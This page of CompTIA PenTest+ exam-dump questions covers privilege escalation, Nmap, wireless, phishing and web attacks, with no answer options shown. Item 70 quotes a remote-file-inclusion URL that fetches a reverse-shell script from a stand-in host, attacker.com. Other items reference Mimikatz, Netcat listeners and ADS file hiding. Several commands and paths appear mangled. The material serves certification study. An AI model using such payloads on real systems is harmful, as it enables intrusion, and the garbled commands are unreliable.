Updated PT0-001 Dumps Questions V12.02 – Great For Preparing CompTIA PenTest+ Exam

1. A penetration tester has successfully exploited a Windows host with low privileges and found directories with the following permissions:

Which of the following should be performed to escalate the privileges?

2. A security team is switching firewall vendors. The director of security wants to scope a penetration test to satisfy requirements to perform the test after major architectural changes .

Which of the following is the BEST way to approach the project?

3. Which of the following commands starts the Metasploit database?

4. A penetration tester delivers a web application vulnerability scan report to a client. The penetration tester rates a vulnerability as medium severity. The same vulnerability was reported as a critical severity finding on the previous report .

Which of the following is the MOST likely reason for the reduced severity?

5. An internal network penetration test is conducted against a network that is protected by an unknown NAC system In an effort to bypass the NAC restrictions the penetration tester spoofs the MAC address and hostname of an authorized system.

Which of the following devices if impersonated would be MOST likely to provide the tester with network access?

6. Which of the following tools can be used to perform a basic remote vulnerability scan of a website's configuration?

7. DRAG DROP

Instructions:

Analyze the code segments to determine which sections are needed to complete a port scanning script.

Drag the appropriate elements into the correct locations to complete the script.

If at any time you would like to bring back the initial state of the simulation, please click the reset all button.

During a penetration test, you gain access to a system with a limited user interface. This machine appears to have access to an isolated network that you would like to port scan.

8. A penetration tester was able to retrieve the initial VPN user domain credentials by phishing a member of the IT department. Afterward, the penetration tester obtained hashes over the VPN and easily cracked them using a dictionary attack.

Which of the following remediation steps should be recommended? (Select THREE)

9. Which of the following describe a susceptibility present in Android-based commercial mobile devices when organizations are not employing MDM services? (Choose two.)

10. When negotiating a penetration testing contract with a prospective client, which of the following disclaimers should be included in order to mitigate liability in case of a future breach of the client’s systems?

11. A penetration tester is exploiting the use of default public and private community strings.

Which of the following protocols is being exploited?

12. A penetration tester is attempting to capture a handshake between a client and an access point by monitoring a WPA2-PSK secured wireless network. The tester is monitoring the correct channel for the identified network, but has been unsuccessful in capturing a handshake.

Given the scenario, which of the following attacks would BEST assist the tester in obtaining this handshake?

13. A penetration tester has compromised a host .

Which of the following would be the correct syntax to create a Netcat listener on the device?

14. Joe, a penetration tester, has received basic account credentials and logged into a Windows system.

To escalate his privilege, from which of the following places is he using Mimikatz to pull credentials?

15. A penetration tester locates a few unquoted service paths during an engagement .

Which of the following can the tester attempt to do with these?

16. A penetration tester, who is not on the client’s network. is using Nmap to scan the network for hosts that are in scope.

The penetration tester is not receiving any response on the command: nmap 100.100/1/0-125

Which of the following commands would be BEST to return results?

17. A penetration tester executes the following commands:

C:>%userprofile%jtr.exe

This program has been blocked by group policy

C:> accesschk.exe -w -s -q -u Users C:Windows

rw C:WindowsTracing

C:>copy %userprofile%jtr.exe C:WindowsTracing

C:WindowsTracingjtr.exe

jtr version 3.2…

jtr>

Which of the following is a local host vulnerability that the attacker is exploiting?

18. Which of the following is an example of a spear phishing attack?

19. An organization has requested that a penetration test be performed to determine if it is possible for an attacker to gain a foothold on the organization's server segment During the assessment, the penetration tester identifies tools that appear to have been left behind by a prior attack.

Which of the following actions should the penetration tester take?

20. A penetration tester is outside of an organization's network and is attempting to redirect users to a fake password reset website hosted on the penetration tester's box .

Which of the following techniques is suitable to attempt this?

21. A penetration tester is testing a banking application and uncovers a vulnerability. The tester is logged in as a non-privileged user who should have no access to any data.

Given the data below from the web interception proxy

Request

POST /Bank/Tax/RTSdocuments/ HTTP 1.1

Host: test.com

Accept: text/html; application/xhtml+xml

Referrer: https://www.test.com/Bank/Tax/RTSdocuments/

Cookie: PHPSESSIONID: ;

Content-Type: application/form-data;

Response

403 Forbidden

<tr>

<td> Error:</td></tr>

<tr><td> Insufficient Privileges to view the data. </td></tr>

Displaying 1-10 of 105 records

Which of the following types of vulnerabilities is being exploited?

22. A tester has captured a NetNTLMv2 hash using Responder.

Which of the following commands will allow the tester to crack the hash using a mask attack?

23. During post-exploitation, a tester identifies that only system binaries will pass an egress filter and store a file with the following command:

c: creditcards.db>c:winitsystem32calc.exe:creditcards.db

Which of the following file system vulnerabilities does this command take advantage of?

24. A web server is running PHP, and a penetration tester is using LFI to execute commands by passing parameters through the URL. This is possible because server logs were poisoned to execute the PHP system ( ) function .

Which of the following would retrieve the contents of the passwd file?

25. A vulnerability scan identifies that an SSL certificate does not match the hostname; however, the client disputes the finding .

Which of the following techniques can the penetration tester perform to adjudicate the validity of the findings?

26. In which of the following scenarios would a tester perform a Kerberoasting attack?

27. A penetration tester is utilizing social media to gather information about employees at a company. The tester has created a list of popular words used in employee profile s.

For which of the following types of attack would this information be used?

28. After gaining initial low-privilege access to a Linux system, a penetration tester identifies an interesting binary in a user’s folder titled “changepass”

-sr Cxr -x 1 root root 6443 Oct 18 2017 /home/user/changepass

Using “strings” to print ASCII printable characters from changepass, the tester notes the following:

$ strings changepass

Exit

setuid

strmp

GLINC _2.0

ENV_PATH

%s/changepw

malloc

strlen

Given this information, which of the following is the MOST likely path of exploitation to achieve root privileges on the machines?

29. A penetration tester observes that several high numbered ports are listening on a public web server. However, the system owner says the application only uses port 443 .

Which of the following would be BEST to recommend?

30. Which of the following types of physical security attacks does a mantrap mitigate-?

31. Which of the following CPU registers does the penetration tester need to overwrite in order to exploit a simple buffer overflow?

32. Which of the following documents BEST describes the manner in which a security assessment will be conducted?

33. A penetration tester has compromised a system and wishes to connect to a port on it from the attacking machine to control the system.

Which of the following commands should the tester run on the compromised system?

34. A penetration tester is preparing for an assessment of a web server's security, which is used to host several sensitive web applications. The web server is PKI protected, and the penetration tester reviews the certificate presented by the server during the SSL handshake .

Which of the following certificate fields or extensions would be of MOST use to the penetration tester during an assessment?

35. A constant wants to scan all the TCP Pots on an identified device .

Which of the following Nmap switches will complete this task?

36. A penetration tester must assess a web service .

Which of the following should the tester request during the scoping phase?

37. A penetration tester is assessing the security of a web form for a client and enters “;id” in one of the fields.

The penetration tester observes the following response:

Based on the response, which of the following vulnerabilities exists?

38. A penetration tester has been asked to conduct OS fingering with Nmap using a company-provided text file that contains a list of IP addresses .

Which of the following are needed to conduct this scan? (Choose two.)

39. During a web application assessment, a penetration tester discovers that arbitrary commands can be executed on the server. Wanting to take this attack one step further, the penetration tester begins to explore ways to gain a reverse shell back to the attacking machine at 192.168.1.5 .

Which of the following are possible ways to do so? (Select TWO)

40. A penetration tester ran the following Nmap scan on a computer:

nmap -aV 192.168.1.5

The organization said it had disabled Telnet from its environment. However, the results of the Nmap scan show port 22 as closed and port 23 as open to SSH .

Which of the following is the BEST explanation for what happened?

41. A penetration tester is required to exploit a WPS implementation weakness .

Which of the following tools will perform the attack?

42. A penetration tester has obtained access to an IP network subnet that contains ICS equipment intercommunication .

Which of the following attacks is MOST likely to succeed in creating a physical effect?

43. CORRECT TEXT

You are a penetration tester running port scans on a server.

INSTRUCTIONS

Part1: Given the output, construct the command that was used to generate this output from the available options.

Part2: Once the command is appropriately constructed, use the given output to identify the potential attack vectors that should be investigated further.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Part1

Part2

44. A penetration tester is required to perform OSINT on staff at a target company after completing the infrastructure aspect .

Which of the following would be the BEST step for the penetration tester to take?

45. A penetration tester is testing a web application and is logged in as a lower-privileged user. The tester runs arbitrary JavaScript within an application, which sends an XMLHttpRequest, resulting in exploiting features to which only an administrator should have access .

Which of the following controls would BEST mitigate the vulnerability?

46. CORRECT TEXT

You are a penetration tester reviewing a client’s website through a web browser.

INSTRUCTIONS

Review all components of the website through the browser to determine if vulnerabilities are present.

Remediate ONLY the highest vulnerability from either the certificate, source, or cookies.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

47. A penetration tester runs a script that queries the domain controller for user service principal names .

Which of the following techniques is MOST likely being attempted?

48. A security assessor is attempting to craft specialized XML files to test the security of the parsing functions during ingest into a Windows application.

Before beginning to test the application, which of the following should the assessor request from the organization?

49. HOTSPOT

Instructions:

Given the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

You are a security analyst tasked with hardening a web server.

You have been given a list of HTTP payloads that were flagged as malicious.

50. A penetration tester has successfully deployed an evil twin and is starting to see some victim traffic. The next step the penetration tester wants to take is to capture all the victim web traffic unencrypted .

Which of the following would BEST meet this goal?

51. A penetration tester runs the following on a machine:

Which of the following will be returned?

52. Which of the following commands will allow a tester to enumerate potential unquoted services paths on a host?

53. When performing compliance-based assessments, which of the following is the MOST important Key consideration?

54. A penetration tester notices that the X-Frame-Optjons header on a web application is not set .

Which of the following would a malicious actor do to exploit this configuration setting?

55. A penetration tester successfully exploits a Windows host and dumps the hashes.

Which of the following hashes can the penetration tester use to perform a pass-the-hash attack?

A)

B)

C)

D)

56. A penetration tester is performing a black-box test of a client web application, and the scan host is unable to access it. The client has sent screenshots showing the system is functioning correctly .

Which of the following is MOST likely the issue?

57. An engineer, who is conducting a penetration test for a web application, discovers the user login process sends from field data using the HTTP GET method.

To mitigate the risk of exposing sensitive information, the form should be sent using an:

58. A client needs to be PCI compliant and has external-facing web servers .

Which of the following CVSS vulnerability scores would automatically bring the client out of compliance standards such as PCI 3.x?

59. A consultant is performing a social engineering attack against a client. The consultant was able to collect a number of usernames and passwords using a phishing campaign. The consultant is given credentials to log on to various employees email accounts.

Given the findings, which of the following should the consultant recommend be implemented?

60. A penetration tester has access to a local machine running Linux, but the account has limited privileges .

Which of the following types of files could the tester BEST use for privilege escalation?

61. A company planned for and secured the budget to hire a consultant to perform a web application penetration test.

Upon discovered vulnerabilities, the company asked the consultant to perform the following tasks:

• Code review

• Updates to firewall setting

62. Which of the following BEST describes why an MSA is helpful?

63. Which of the following tools would a penetration tester leverage to conduct OSINT? (Select TWO).

64. DRAG DROP

Instructions:

Analyze the code segments to determine which sections are needed to complete a port scanning script.

Drag the appropriate elements into the correct locations to complete the script.

If at any time you would like to bring back the initial state of the simulation, please click the reset all button.

During a penetration test, you gain access to a system with a limited user interface. This machine appears to have access to an isolated network that you would like to port scan.

65. A penetration tester is performing a code review .

Which of the following testing techniques is being performed?

66. An attacker is attempting to gain unauthorized access to a WiR network that uses WPA2-PSK.

Which of the following attack vectors would the attacker MOST likely use?

67. A company contracted a firm specializing in penetration testing to assess the security of a core business application. The company provided the firm with a copy of the Java bytecode .

Which of the following steps must the firm take before it can run a static code analyzer?

68. Given the following Python code:

a = 'abcdefghijklmnop'

a[::2]

Which of the following will result?

69. During a penetration test, a tester runs a phishing campaign and receives a shell from an internal PC running Windows 10 OS. The tester wants to perform credential harvesting with Mimikatz.

Which of the following registry changes would allow for credential caching in memory?

70. While monitoring WAF logs, a security analyst discovers a successful attack against the following URL: https://example.com/index.php?Phone=http://attacker.com/badstuffhappens/revshell.php

Which of the following remediation steps should be taken to prevent this type of attack?

71. A penetration tester is performing ARP spoofing against a switch .

Which of the following should the penetration tester spoof to get the MOST information?

72. A penetration tester is designing a phishing campaign and wants to build list of users (or the target organization .

Which of the following techniques would be the MOST appropriate? (Select TWO)

73. A penetration tester has been hired to perform a penetration test for an organization .

Which of the following is indicative of an error-based SQL injection attack?

74. While conducting information gathering, a penetration tester is trying to identify Windows hosts .

Which of the following characteristics would be BEST to use for fingerprinting?

75. A consultant is identifying versions of Windows operating systems on a network.

Which of the following Nmap commands should the consultant run?

76. A company received a report with the following finding . While on the internal network the penetration tester was able to successfully capture SMB broadcasted user ID and password information on the network and decode this information. This allowed the penetration tester to then join their own computer to the ABC domain.

Which of the following remediation’s are appropriate for the reported findings'? (Select TWO)

77. The results of a basic compliance scan show a subset of assets on a network. This data differs from what is shown on the network architecture diagram, which was supplied at the beginning of the test .

Which of the following are the MOST likely causes for this difference? (Select TWO)

78. Joe, an attacker, intends to transfer funds discreetly from a victim’s account to his own .

Which of the following URLs can he use to accomplish this attack?

79. A penetration tester has been assigned to perform an external penetration assessment of a company .

Which of the following steps would BEST help with the passive-information-gathering process? (Choose two.)

80. Which of the following reasons does penetration tester needs to have a customer's point-of -contact information available at all time? (Select THREE).